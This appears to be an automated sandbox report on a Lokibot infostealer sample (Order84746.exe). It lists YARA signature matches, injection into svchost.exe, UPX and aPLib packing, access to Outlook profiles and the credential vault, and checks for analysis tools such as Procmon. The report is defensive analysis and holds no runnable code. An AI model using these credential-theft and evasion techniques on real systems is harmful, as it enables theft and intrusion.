              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: Process Memory Space: Order84746.exe PID: 280, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: Process Memory Space: svchost.exe PID: 3300, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: Order84746.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9887223718424963
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@0/1
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0092CE7A GetLastError,FormatMessageW,0_2_0092CE7A
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0091AB84 AdjustTokenPrivileges,CloseHandle,0_2_0091AB84
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0091B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0091B134
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040650A
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0092E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0092E1FD
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00926532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00926532
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0093C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0093C18C
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008E406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008E406B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,1_2_00FA3360
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,1_2_00FA3360
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
              Source: C:\Users\user\Desktop\Order84746.exeFile created: C:\Users\user\AppData\Local\Temp\aut3820.tmpJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: svchost.exe, 00000001.00000003.1677073300.00000000033F5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Order84746.exeReversingLabs: Detection: 26%
              Source: unknownProcess created: C:\Users\user\Desktop\Order84746.exe "C:\Users\user\Desktop\Order84746.exe"
              Source: C:\Users\user\Desktop\Order84746.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Order84746.exe"
              Source: C:\Users\user\Desktop\Order84746.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Order84746.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: Binary string: wntdll.pdbUGP source: Order84746.exe, 00000000.00000003.1675657454.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Order84746.exe, 00000000.00000003.1675962335.0000000003970000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Order84746.exe, 00000000.00000003.1675657454.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Order84746.exe, 00000000.00000003.1675962335.0000000003970000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2659065134.0000000000FA1000.00000020.00000001.01000000.00000005.sdmp
              Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.2659065134.0000000000FA1000.00000020.00000001.01000000.00000005.sdmp

              Data Obfuscation

              barindex
              Yara detected aPLib compressed binary
              Source: Yara matchFile source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Order84746.exe PID: 280, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3300, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009E5F50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_009E5F50
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0090C09E push esi; ret 0_2_0090C0A0
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0090C187 push edi; ret 0_2_0090C189
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094C8BC push esi; ret 0_2_0094C8BE
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00906B05 push ecx; ret 0_2_00906B18
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0092B2B1 push FFFFFF8Bh; iretd 0_2_0092B2B3
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0090BDAA push edi; ret 0_2_0090BDAC
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0090BEC3 push esi; ret 0_2_0090BEC5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AD4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AFC
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,1_2_00FA3360
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00948111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00948111
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008FEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008FEB42
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0090123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0090123A
              Source: C:\Users\user\Desktop\Order84746.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\Order84746.exeAPI/Special instruction interceptor: Address: 11DBE6C
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: Order84746.exe, 00000000.00000003.1666922397.0000000001032000.00000004.00000020.00020000.00000000.sdmp, Order84746.exe, 00000000.00000003.1667040845.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, Order84746.exe, 00000000.00000002.1677928248.00000000010A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE#
              Source: C:\Users\user\Desktop\Order84746.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-95294
